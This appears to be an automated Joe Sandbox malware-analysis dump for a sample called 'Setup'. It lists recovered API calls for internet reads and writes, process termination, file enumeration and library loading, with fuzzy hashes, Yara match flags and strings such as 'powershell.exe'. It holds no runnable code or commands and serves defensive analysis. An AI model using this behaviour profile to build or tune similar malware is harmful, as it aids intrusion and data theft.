                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(-00000019,031F7954,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317AA5B
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?), ref: 0317AA7A
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC), ref: 0317AA8D
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,?,?,?,031F7A1C,?,03203654,031F7A00,?), ref: 0317AABB
                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?), ref: 0317AACE
                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,?,?,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8), ref: 0317ACBE
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,031F79CC,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317ACC9
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,031F7A1C,?,03203654,031F7A00,?,03203654,031F79E8,?,03203654,031F79CC,?), ref: 0317ACD0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Virtual$Free$Alloc$ByteCharExtendedHeapMultiTableWide$Process
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1791798720-0

Control-flow Graph
[Graph rendering not reproduced; first node at 319f4c0. Legend: Executed / Not Executed]
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0319F2B0: __Xtime_get_ticks.LIBCPMT ref: 0319F2E2
                                                                                                                                                                                                                                                        • Part of subcall function 0319F2B0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0319F2F0
                                                                                                                                                                                                                                                      • FindWindowA.USER32(031F71B0,031F6626), ref: 0319F996
                                                                                                                                                                                                                                                        • Part of subcall function 0319DEB0: InternetOpenUrlA.WININET ref: 0319E086
                                                                                                                                                                                                                                                        • Part of subcall function 0319DEB0: InternetReadFile.WININET ref: 0319E0EA
                                                                                                                                                                                                                                                        • Part of subcall function 0319DEB0: InternetReadFile.WININET ref: 0319E136
                                                                                                                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 0319FD6A
                                                                                                                                                                                                                                                        • Part of subcall function 03185030: Concurrency::cancel_current_task.LIBCPMT ref: 0318534B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Internet$FileRead$Concurrency::cancel_current_taskExitFindOpenThreadUnothrow_t@std@@@UserWindowXtime_get_ticks__ehfuncinfo$??2@
                                                                                                                                                                                                                                                      • String ID: .$1735337711$https://$https://
                                                                                                                                                                                                                                                      • API String ID: 1741030633-881400878

Control-flow Graph
[Graph rendering not reproduced; first node at 3179500. Legend: Executed / Not Executed]
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InternetWriteFile.WININET(00000000,?,?,?), ref: 031796EB
                                                                                                                                                                                                                                                      • InternetWriteFile.WININET(00000000,--------,0000000C,?), ref: 0317971B
                                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(00000000,?,03205040,00000003,?), ref: 031797B4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileInternetWrite$DebugOutputString
                                                                                                                                                                                                                                                      • String ID: --------$($/?#
                                                                                                                                                                                                                                                      • API String ID: 2994765058-4100224915

Control-flow Graph
[Graph rendering not reproduced; first node at 31c3472. Legend: Executed / Not Executed]
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 031C35FA
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031C3616
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 031C362D
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031C364B
                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 031C3662
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031C3680
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                                                                                                                      • Opcode ID: 5ed403bdb2a50c1951712f0982c6f736e4f74098a96fc3379f0e513d39c29211
                                                                                                                                                                                                                                                      • Instruction ID: 77c456128cbb58f0564e5bdf6d379d848c54941638bc8b020494483dada943f5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ed403bdb2a50c1951712f0982c6f736e4f74098a96fc3379f0e513d39c29211
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37814D79610B929BD725DF29CC41B5AB3E9AF5D360F14C92DE021DB3C0EB78D6018790

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?,?,?), ref: 031A5645
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 031A5654
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 031A565B
                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(?,?), ref: 031A566E
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 031A5688
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 031A5693
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseHandleProcess$NextOpenProcess32SleepTerminate
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2662874868-0
                                                                                                                                                                                                                                                      • Opcode ID: ea86d6f385460b3bffa23b069cc9d258a06a38879ab175af47c98446447b1bd7
                                                                                                                                                                                                                                                      • Instruction ID: e3121e9a12fa3a369ac13d69a8c1f71aa5124cc69da995e3da2ccdb91ffbb846
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea86d6f385460b3bffa23b069cc9d258a06a38879ab175af47c98446447b1bd7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E317E39804668DBDB24EB68CC48BEEB7B6FF49305F1842D9D84967180DB751B84CF90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000,?,?), ref: 02DC2637
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                                                      • String ID: .dll
                                                                                                                                                                                                                                                      • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                                                      • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                                      • Instruction ID: 5a5c4ea598fc488ed728ed702c4e876aa84583ab47a72dae3ae8cd674113a3b3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C82106726006C68FD722DFA8C858B6A7BA4EF05324F28406DDC01CBB41DB30EC45CB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,031DA896,?,00000000,?,?,031DAB37,?,00000007,?,?,031DB0EC,?,?), ref: 031D25A4
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,031DA896,?,00000000,?,?,031DAB37,?,00000007,?,?,031DB0EC,?,?), ref: 031D25AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                                      • Opcode ID: a6e709de71434058b9a5cd73eaa807ce69a96d708a7b262a6be8ecc60903502b
                                                                                                                                                                                                                                                      • Instruction ID: 97a5c5d09abb9774dd7d1df985fffaa758069d951a54d947f7dd80ecc08e57d5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6e709de71434058b9a5cd73eaa807ce69a96d708a7b262a6be8ecc60903502b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3E08C36504304ABCB22BFA5AC0CBCA7BA8AB8D396F144464FA188B050DF35869197E0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,031D5105,00000000,00000000,00000000), ref: 031D4FC4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InformationTimeZone
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 565725191-0
                                                                                                                                                                                                                                                      • Opcode ID: b6f7d48838ab4dd15fcbc66b3f92c51f73711c1d77119c87461b1cb8e12e78c6
                                                                                                                                                                                                                                                      • Instruction ID: 4f53de241d897347093da1d83ba9ec7f894666a8bc5aea32ac0c9cf4325bd1d2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6f7d48838ab4dd15fcbc66b3f92c51f73711c1d77119c87461b1cb8e12e78c6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21C11576900221ABDB14FF6ADC05ABEB7B9EF0E710F584056E905EF280EF719A51C790
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0319F1C7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 0f0efa303d524cd805e6843cfb737dafd762663b3d8456c8b888b3299e122b9a
                                                                                                                                                                                                                                                      • Instruction ID: dc56a0a123b43b46ead82e4b9f6c88c0dfdfb7db5ac934c85a085834b1566604
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f0efa303d524cd805e6843cfb737dafd762663b3d8456c8b888b3299e122b9a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C9151B5D00219AFDF14DFA8D985AAEBBF9EB4C310F14422AE415E7340E731A911CBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0318534B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0318BA9F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0318B962
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000), ref: 03178D4C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharConcurrency::cancel_current_taskInternetMultiOpenWide
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 03186133
                                                                                                                                                                                                                                                        • Part of subcall function 03176690: ___std_exception_copy.LIBVCRUNTIME ref: 031766F1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task___std_exception_copy
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02DC1271
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 031766F1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?,03205040), ref: 031A50C2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FolderPath
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1514166925-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,031766AC,?,?,?,?,031766AC,?,0320384C), ref: 031BFA2E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 6842923-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,?), ref: 031D2572
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 031D3B4E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 03171239
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1721193555-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317CA1A
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317CA21
                                                                                                                                                                                                                                                        • Part of subcall function 03182A20: NtQueryAttributesFile.NTDLL ref: 03182B25
                                                                                                                                                                                                                                                        • Part of subcall function 031A5280: NtCreateFile.NTDLL ref: 031A5433
                                                                                                                                                                                                                                                        • Part of subcall function 031A5280: GetProcessHeap.KERNEL32 ref: 031A5459
                                                                                                                                                                                                                                                        • Part of subcall function 031A5280: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 031A5463
                                                                                                                                                                                                                                                        • Part of subcall function 031A5280: NtReadFile.NTDLL ref: 031A5493
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317CE03
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317D1E4
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317D1EB
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317D5BF
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317D99A
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317D9A1
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317DD5E
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317DD65
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317D5C6
                                                                                                                                                                                                                                                        • Part of subcall function 03186050: Concurrency::cancel_current_task.LIBCPMT ref: 03186133
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317CE0A
                                                                                                                                                                                                                                                        • Part of subcall function 0318B220: Concurrency::cancel_current_task.LIBCPMT ref: 0318B36D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$Process$Free$Concurrency::cancel_current_taskFile$AllocateAttributesCreateQueryRead
                                                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                                                      • API String ID: 4111404930-1885708031
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0317DF52
                                                                                                                                                                                                                                                      • PathMatchSpecA.SHLWAPI(?,00000000,?,?), ref: 0317E074
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,?,?,031F675C,00000001,?,?,00000002), ref: 0317E1D0
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 0317E29F
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0317E2AE
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 0317E2E2
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,?,?), ref: 0317E301
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0317E30D
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0317E3D0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$CloseFile$FirstNext$MatchPathSpec
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2359873101-0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DispatcherExceptionFolderPathUser
                                                                                                                                                                                                                                                      • String ID: )$-$powershell.exe$type must be number, but is
                                                                                                                                                                                                                                                      • API String ID: 3583530794-3753438943
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 031DC1C2
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 031DC1EB
                                                                                                                                                                                                                                                      • GetACP.KERNEL32 ref: 031DC200
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskFolderPath
                                                                                                                                                                                                                                                      • String ID: J
                                                                                                                                                                                                                                                      • API String ID: 1258877742-1141589763
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: GetLastError.KERNEL32(00000000,?,031D9FF0), ref: 031D363D
                                                                                                                                                                                                                                                        • Part of subcall function 031D3639: SetLastError.KERNEL32(00000000,00000000,00000000,032051F0,000000FF), ref: 031D36DF
                                                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32 ref: 031DC40D
                                                                                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 031DC44B
                                                                                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 031DC45E
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 031DC4A6
                                                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 031DC4C1
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 415426439-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 031A210D
                                                                                                                                                                                                                                                      • CoCreateInstance.COMBASE(031ED1E0,00000000,00000001,031ED1C0,?), ref: 031A2128
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 031A2182
                                                                                                                                                                                                                                                      • CoUninitialize.COMBASE ref: 031A220A
                                                                                                                                                                                                                                                      • CoUninitialize.COMBASE ref: 031A2276
                                                                                                                                                                                                                                                      Similarity
